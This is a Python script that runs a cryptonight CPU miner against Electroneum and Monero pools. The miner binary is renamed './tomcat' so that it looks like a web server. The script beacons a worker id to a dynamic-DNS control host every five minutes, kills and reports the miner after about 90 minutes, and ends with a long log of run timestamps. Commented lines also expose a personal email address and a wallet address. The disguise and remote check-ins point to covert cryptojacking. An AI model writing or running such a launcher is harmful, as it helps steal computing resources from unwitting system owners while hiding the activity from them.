import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:41:04.360187
#2018-02-17 16:27:04.697456
#2018-02-17 18:13:06.231811
#2018-02-17 20:01:05.851413
#2018-02-17 21:49:05.874212
#2018-02-17 23:35:06.676360
#2018-02-18 01:23:07.226684
#2018-02-18 03:10:06.817070
#2018-02-18 04:57:06.759129
#2018-02-18 06:48:06.239516
#2018-02-18 08:38:06.999171
#2018-02-18 10:24:05.854112
#2018-02-18 12:10:06.349636
#2018-02-18 13:56:05.681027
#2018-02-18 15:46:07.041977
#2018-02-18 17:36:05.460974
#2018-02-18 19:24:06.305770
#2018-02-18 21:09:06.651104
#2018-02-18 22:56:01.691630
#2018-02-19 00:44:02.146975
#2018-02-19 02:31:04.501464
#2018-02-19 04:17:06.878237
#2018-02-19 06:03:06.328379
#2018-02-19 07:51:05.074960
#2018-02-19 09:41:02.220225
#2018-02-19 11:31:01.250620
#2018-02-19 13:18:06.115328
#2018-02-19 15:07:05.511224
#2018-02-19 16:55:07.108352
#2018-02-19 18:43:06.227038
#2018-02-19 20:32:01.477815
#2018-02-19 22:20:08.346561
#2018-02-20 00:05:06.740063
#2018-02-20 01:53:06.359347
#2018-02-20 03:42:06.396092
#2018-02-20 05:30:01.942851
#2018-02-20 07:14:05.355050
#2018-02-20 09:01:01.367936
#2018-02-20 10:44:09.192896
#2018-02-20 12:31:07.363315
#2018-02-20 14:17:01.218002
#2018-02-20 16:00:11.320322
#2018-02-20 17:47:01.467323
#2018-02-20 19:40:01.486631
#2018-02-20 21:27:08.839350
#2018-02-20 23:11:07.939223
#2018-02-21 00:57:05.482527
#2018-02-21 02:45:06.112684
#2018-02-21 04:34:04.965784
#2018-02-21 06:21:06.855903
#2018-02-21 08:06:08.424910
#2018-02-21 09:52:05.600527
#2018-02-21 11:40:11.936998
#2018-02-21 13:31:03.927245
#2018-02-21 15:16:02.131371
#2018-02-21 17:06:04.496145
#2018-02-21 18:53:09.192442
#2018-02-21 20:44:08.141249
#2018-02-21 22:30:11.557218
#2018-02-22 00:20:06.996580
#2018-02-22 02:09:05.995393
#2018-02-22 03:55:03.242525
#2018-02-22 05:42:05.519039
#2018-02-22 07:26:07.091471
#2018-02-22 09:14:04.260677
#2018-02-22 11:01:08.082100
#2018-02-22 12:48:10.681249
#2018-02-22 14:36:05.620652
#2018-02-22 16:22:07.378766
#2018-02-22 18:09:11.270731
#2018-02-22 19:59:04.582823
#2018-02-22 21:48:05.631379
#2018-02-22 23:35:06.768813
#2018-02-23 01:22:06.000635
#2018-02-23 03:08:06.055225
#2018-02-23 04:54:05.133893
#2018-02-23 06:39:06.604510
#2018-02-23 08:27:04.681841
#2018-02-23 10:43:06.012353
#2018-02-23 12:40:07.277254
#2018-02-23 14:23:08.063225
#2018-02-23 16:14:07.925499
#2018-02-23 18:56:08.824589
#2018-02-23 20:42:04.311775
#2018-02-23 22:29:07.034666
#2018-02-24 00:16:05.977609
#2018-02-24 02:09:01.468290
#2018-02-24 03:59:04.321519
#2018-02-24 06:42:06.492608
#2018-02-24 08:31:05.992416
#2018-02-24 10:18:02.140855
#2018-02-24 12:13:05.221639
#2018-02-24 13:59:07.326936
#2018-02-24 15:51:07.895130
#2018-02-24 17:37:04.061017
#2018-02-24 19:23:06.954078
#2018-02-24 21:14:05.899847
#2018-02-24 23:50:03.428379
#2018-02-25 03:09:03.863303
#2018-02-25 06:54:04.511380